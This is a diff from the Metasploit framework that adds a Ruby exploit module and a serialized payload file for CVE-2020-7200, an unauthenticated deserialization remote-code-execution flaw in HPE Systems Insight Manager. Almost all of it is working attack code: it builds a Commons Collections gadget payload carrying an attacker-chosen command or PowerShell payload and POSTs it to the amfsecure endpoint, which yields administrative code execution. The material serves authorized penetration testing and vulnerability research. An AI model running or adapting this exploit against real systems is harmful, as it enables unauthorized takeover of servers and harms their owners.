rapid7
diff --git a/‎data/exploits/hpe_sim_76_amf_deserialization/emp.ser
1.31 KB b/‎data/exploits/hpe_sim_76_amf_deserialization/emp.ser
1.31 KB
diff --git a/‎modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb
+148 b/‎modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb
+148
@@ -0,0 +1,148 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'HPE Systems Insight Manager AMF Deserialization RCE',
+        'Description' => %q{
+          A remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be
+          leveraged by a remote unauthenticated attacker to execute code within the context of HPE System Insight
+          Manager's hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due
+          to a failure to validate data during the deserialization process when a user submits a POST request to
+          the /simsearch/messagebroker/amfsecure page. This module exploits this vulnerability by leveraging an
+          outdated copy of Coommons Collection, namely 3.2.2, that ships with HPE SIM, to gain
+          RCE as the administrative user running HPE SIM.
+        },
+        'Author' => [
+          'Harrison Neal', # Original bug finder, reported bug to ZDI
+          'Jang', # Aka @testbnull, editor of nightst0rm, who wrote a very detailed writeup of this bug in Vietnamese
+          'Grant Willcox' # Metasploit module author
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2020-7200'],
+          ['URL', 'https://testbnull.medium.com/hpe-system-insight-manager-sim-amf-deserialization-lead-to-rce-cve-2020-7200-d49a9cf143c0'],
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-20-1449/']
+        ],
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command,
+              'Space' => 64000
+            }
+          ],
+          [
+            'Windows Powershell',
+            {
+              'Arch' => [ARCH_X64],
+              'Type' => :windows_powershell,
+              'Space' => 64000
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 50000,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2020-12-15',
+        'Notes' =>
+        {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the HPE SIM server', '/' ])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'simsearch', 'messagebroker', 'amfsecure')
+    })
+
+    return CheckCode::Unknown('Failed to connect to the server.') if res.nil?
+    return CheckCode::Safe('Failed to identify an active amfsecure endpoint on the target.') unless res&.code == 200
+
+    CheckCode::Appears('Found an active amfsecure endpoint on the target!')
+  end
+
+  def exploit
+    case target['Type']
+    when :windows_command
+      execute_command(payload.encoded.gsub!(/^powershell.exe /, 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '))
+    when :windows_powershell
+      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true).gsub!(/^powershell.exe /, 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '))
+    end
+  end
+
+  def payload_template_adjustments(original_content, cmd)
+    p cmd
+    original_content['PAYLOAD'] = cmd
+    original_content[0x47A..0x47B] = [cmd.length].pack('n')
+
+    second_adjustment_length = original_content[0x3C..-1].length * 2
+    if (second_adjustment_length >> 7 >> 7 >> 8) != 0
+      fourth_number = (second_adjustment_length & 0x7F) + 1
+      third_number = (second_adjustment_length >> 7) | 0x80 # And with 0xFF00 to only get the top 8 bytes. Then right shift by 7 to undo the left shift by 7 in the code, and
+      # since this is a number greater than 0x7F, add in the sign bit again by ORing with 0x80.
+      second_number = (second_adjustment_length >> 7 >> 7) | 0x80 # Same thing as above but right shift 7 twice to undo the left shift by 7 twice in the code.
+      first_number = (second_adjustment_length >> 7 >> 7 >> 8) | 0x80 # Same thing as above but right shift 7 twice to undo the left shift by 7 twice in the code and also right shift by 8 to undo the left shift by 8 in the code.
+      original_content[0x3A..0x3B] = [first_number, second_number, third_number, fourth_number].pack('cccc')
+    elsif (second_adjustment_length >> 7 >> 7) != 0
+      third_number = (second_adjustment_length & 0x7F) + 1
+      second_number = (second_adjustment_length >> 7) | 0x80 # And with 0xFF00 to only get the top 8 bytes. Then right shift by 7 to undo the left shift by 7 in the code, and
+      # since this is a number greater than 0x7F, add in the sign bit again by ORing with 0x80.
+      first_number = (second_adjustment_length >> 7 >> 7) | 0x80 # Same thing as above but right shift 7 twice to undo the left shift by 7 twice in the code.
+      original_content[0x3A..0x3B] = [first_number, second_number, third_number].pack('ccc')
+    elsif (second_adjustment_length >> 7) != 0
+      second_number = (second_adjustment_length & 0x7F) + 1
+      first_number = (second_adjustment_length >> 7) | 0x80 # And with 0xFF00 to only get the top 8 bytes. Then right shift by 7 to undo the left shift by 7 in the code, and
+      # since this is a number greater than 0x7F, add in the sign bit again by ORing with 0x80.
+      original_content[0x3A..0x3B] = [first_number, second_number].pack('cc')
+    else
+      original_content[0x3A..0x3B] = [second_adjustment_length + 1].pack('c')
+    end
+    original_content
+  end
+
+  def execute_command(cmd, _opts = {})
+    data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
+    f_handle = File.open(File.join(data_dir, 'emp.ser'), 'rb')
+    serialized_payload_content = f_handle.read
+    f_handle.close
+    serialized_payload_content_final = payload_template_adjustments(serialized_payload_content, cmd)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'simsearch', 'messagebroker', 'amfsecure'),
+      'data' => serialized_payload_content_final
+    })
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Non-200 HTTP response received while trying to execute the command')
+    end
+    if !res.to_s.include?('java.lang.NullPointerException')
+      fail_with(Failure::UnexpectedReply, 'Server should respond with a java.lang.NullPointerException upon successful deserialization, but no such message was recieved!')
+    end
+  end
+end